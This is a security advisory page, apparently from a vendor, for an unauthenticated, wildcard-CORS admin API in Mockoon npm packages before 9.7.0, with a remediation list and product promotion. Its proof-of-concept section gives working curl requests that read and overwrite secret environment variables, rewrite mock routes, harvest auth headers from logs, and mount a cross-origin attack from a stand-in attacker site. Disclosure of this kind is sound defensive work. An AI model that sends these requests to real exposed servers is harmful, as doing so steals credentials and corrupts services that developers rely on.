CVE-2026-59148

CVE-2026-59148 is a high-severity missing authentication for critical function vulnerability in @mockoon/commons-server (npm), affecting versions < 9.7.0. It is fixed in 9.7.0.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

@Mockoon/commons-server: Unauthenticated admin API + wildcard CORS allows mock-state hijack and secret theft

Mockoon's admin API (commons-server/src/libs/server/admin-api.ts) is mounted on the same Express listener as the user-defined mock routes, enabled by default in every shipped runtime (commons-server, CLI, serverless), serves Access-Control-Allow-Origin: * on every endpoint with all HTTP methods allowed including PUT/POST/PATCH/DELETE/PURGE and Content-Type in Access-Control-Allow-Headers, and has zero authentication of any kind (no token, no shared secret, no MOCKOON_ADMIN_TOKEN env var, searched the repo, returns zero hits).

Any unauthenticated caller who can reach the mock server's port (default 0.0.0.0:3000) can:

  • Read every MOCKOON_* env var used by the operator as secret material in templates (getEnvVar helper).
  • Write arbitrary process env vars (no prefix check on the WRITE path), poison operator's MOCKOON_API_KEY, MOCKOON_JWT_SECRET, …, or write process-level vars like AWS_SECRET_ACCESS_KEY that the surrounding runtime consumes.
  • Rewrite every mock route's body / status / headers in-runtime via PUT /mockoon-admin/environment, downstream consumers (frontend dev-server, CI test suite, integration partner) receive attacker-controlled responses and headers including Set-Cookie, Location, Content-Security-Policy, etc.
  • Read transaction logs / SSE stream (consumer's request bodies + auth headers in clear).
  • Read/write global template vars; purge state / data buckets / logs.

Because of the wildcard CORS reply, the attack also lands cross-origin from a browser: a developer who runs mockoon-cli start ... locally and visits a malicious website gets their mock state hijacked.

Details

Root cause

packages/commons-server/src/libs/server/server.ts:127:

private options: ServerOptions = {
  ...,
  enableAdminApi: true,        // ← default on
};

packages/cli/src/commands/start.ts:200:

enableAdminApi: !userFlags['disable-admin-api'],   // default true unless --disable-admin-api passed

packages/serverless/src/libs/serverless.ts:21:

enableAdminApi: true,          // ← default on, no flag to disable in the constructor

packages/commons-server/src/libs/server/admin-api.ts:63-74 (permissive CORS on every admin endpoint):

app.use(`${adminApiPrefix}*`, (req, res, next) => {
  res.setHeaders(
    new Headers({
      'Access-Control-Allow-Origin': '*',
      'Access-Control-Allow-Methods':
        'GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS',
      'Access-Control-Allow-Headers':
        'Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With'
    })
  );
  next();
});

packages/commons-server/src/libs/server/admin-api.ts:151-166 (no auth, no prefix check on WRITE):

const setEnvVarHandler = (req, res) => {
  try {
    const { key, value } = req.body;
    if (key !== undefined && value !== undefined) {
      process.env[key] = value;                            // ← any process env, any value
      res.send({ message: `Environment variable '${key}' has been set to '${value}'` });
    } else {
      throw new Error('Key or value missing from request');
    }
  } catch (_error) {
    res.status(400).send({ message: 'Invalid request' });
  }
};

packages/commons-server/src/libs/server/admin-api.ts:373-393 (the most impactful, runtime mock rewrite):

app.put(`${adminApiPrefix}/environment`, (req, res) => {
  try {
    const environment: Environment = EnvironmentSchema.validate(req.body).value;
    if (!environment) {
      res.status(400).send({ message: 'Invalid environment format' });
      return;
    }
    updateEnvironment(environment);                        // ← runtime mutation of every route response
    res.send({ message: 'Environment updated' });
  } catch (_error) {
    res.status(400).send({ message: 'Invalid environment format' });
  }
});

Default hostname: '' (packages/commons/src/constants/environment-schema.constants.ts:33) → Node binds 0.0.0.0/:: (confirmed via lsof). Migration #16 (packages/commons/src/libs/migrations.ts:343) also forces missing hostnames to '0.0.0.0'.

PoC

Live reproduction (2026-05-11, @mockoon/[email protected])

npm install @mockoon/[email protected]. Minimal env.json with one route GET /users/:id whose response templates {{getEnvVar 'MOCKOON_API_KEY'}}. Start with:

MOCKOON_API_KEY="sk-operator-real-secret-DO_NOT_LEAK_xyz789" \
  mockoon-cli start --data env.json --port 3100 --repair --disable-log-to-file

Bind confirmed via lsof:

COMMAND  PID    USER  FD  TYPE  ...  NAME
node    39906  ...   14u  IPv6  ...  TCP *:3100 (LISTEN)    <-- all interfaces

Baseline mock response:

$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}

1) Read operator secret unauth

$ curl -s -i http://127.0.0.1:3100/mockoon-admin/env-vars/API_KEY
HTTP/1.1 200 OK
access-control-allow-origin: *
{"key":"MOCKOON_API_KEY","value":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}

2) Poison operator secret unauth → downstream consumer ingests attacker value

$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-POISONED-BY-ATTACKER"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-POISONED-BY-ATTACKER'"}

$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-POISONED-BY-ATTACKER"}

3) Write arbitrary non-MOCKOON_* env var (no prefix gate)

$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"AWS_SECRET_ACCESS_KEY","value":"overwritten-by-attacker"}'
{"message":"Environment variable 'AWS_SECRET_ACCESS_KEY' has been set to 'overwritten-by-attacker'"}

4) Cross-origin CSRF from https://attacker.evil

$ curl -s -i -X OPTIONS http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Access-Control-Request-Method: POST" \
    -H "Access-Control-Request-Headers: Content-Type"
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With

$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-EXFIL-FROM-attacker.evil"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-EXFIL-FROM-attacker.evil'"}

Wildcard Access-Control-Allow-Origin: * + Access-Control-Allow-Methods covering PUT/POST/PATCH + Content-Type in Access-Control-Allow-Headers mean the browser preflight passes for non-simple JSON POSTs. A developer who visits a malicious site while their Mockoon CLI is running is fully exploitable from JavaScript.

5) Rewrite every mock route via unauth PUT /environment

$ curl -s -X PUT http://127.0.0.1:3100/mockoon-admin/environment \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{ ...full env JSON with route response rewritten to body "ATTACKER_PWNED",
          statusCode 418, header X-Pwned: by-attacker.evil... }'
{"message":"Environment updated"}

$ curl -s -i http://127.0.0.1:3100/users/99
HTTP/1.1 418 I'm a Teapot
X-Pwned: by-attacker.evil
Content-Type: application/json
{"id":"99","name":"ATTACKER_PWNED","role":"admin","backdoor":true}

6) Read transaction logs / SSE stream → harvest consumer's auth headers

$ curl -s http://127.0.0.1:3100/mockoon-admin/logs?limit=2

Each log entry includes consumer's request.headers (Authorization / Cookie / X-API-Key), request.body, request.urlPath, and the response served back, continuous info-disclosure of every API call the legitimate consumer makes against the mock. GET /mockoon-admin/events streams the same data live via SSE.

7) Purge state (DoS)

$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/state/purge
{"response":"Server has been reset to its initial state"}

Impact

In typical local-dev mode (CVSS 8.8 High):

  • Secret read of every MOCKOON_* env var (API keys, JWT signing keys, OAuth client secrets).
  • Secret write to any process.env key, poison operator's secrets, swap AWS/SDK creds.
  • Runtime rewrite of every mock route's body / status / headers → downstream consumer ingests attacker-controlled data + headers (Set-Cookie, Location, CSP).
  • Auth-token harvesting via transaction logs / SSE stream.
  • State purge / DoS.

In network-exposed deployment (CVSS 9.4 Critical):

  • All of the above without user interaction. The serverless wrapper hardcodes enableAdminApi: true; mockoon/cli Docker image inherits the same default and is commonly deployed in shared CI / staging environments.

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

CVE-2026-59148 has a CVSS score of 8.8 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (9.7.0); upgrading removes the vulnerable code path.

Affected versions

@mockoon/commons-server (< 9.7.0) @mockoon/cli (< 9.7.0)

Security releases

@mockoon/commons-server → 9.7.0 (npm) @mockoon/cli → 9.7.0 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

  1. Require explicit authentication on the admin API by default. Print an auto-generated bearer token on CLI startup (Jupyter-style), keyed off MOCKOON_ADMIN_TOKEN env var, compared with crypto.timingSafeEqual.
  2. Stop sending Access-Control-Allow-Origin: * on admin endpoints. Default: no CORS at all (browser will block cross-origin reads). Operators who run a separate admin UI on another origin can opt-in with --admin-api-origin.
  3. Bind the admin API to loopback by default, on a separate port or behind a remote-address check.
  4. Add a prefix check on the setEnvVarHandler matching the prepend behavior on the GET handler, reject any key that doesn't start with envVarsPrefix.
  5. Add SECURITY.md with disclosure instructions.
  6. Ship @mockoon/serverless and mockoon/cli Docker image with enableAdminApi: false by default; opt-in via flag.

Frequently Asked Questions

  1. What is CVE-2026-59148? CVE-2026-59148 is a high-severity missing authentication for critical function vulnerability in @mockoon/commons-server (npm), affecting versions < 9.7.0. It is fixed in 9.7.0. A critical operation is accessible without requiring any authentication.
  2. How severe is CVE-2026-59148? CVE-2026-59148 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2026-59148?
    • @mockoon/commons-server (npm) (versions < 9.7.0)
    • @mockoon/cli (npm) (versions < 9.7.0)
  4. Is there a fix for CVE-2026-59148? Yes. CVE-2026-59148 is fixed in 9.7.0. Upgrade to this version or later.
  5. Is CVE-2026-59148 exploitable, and should I be worried? Whether CVE-2026-59148 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-59148 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-59148?
    • Upgrade @mockoon/commons-server to 9.7.0 or later
    • Upgrade @mockoon/cli to 9.7.0 or later

Stop the waste.
Protect your environment with Kodem.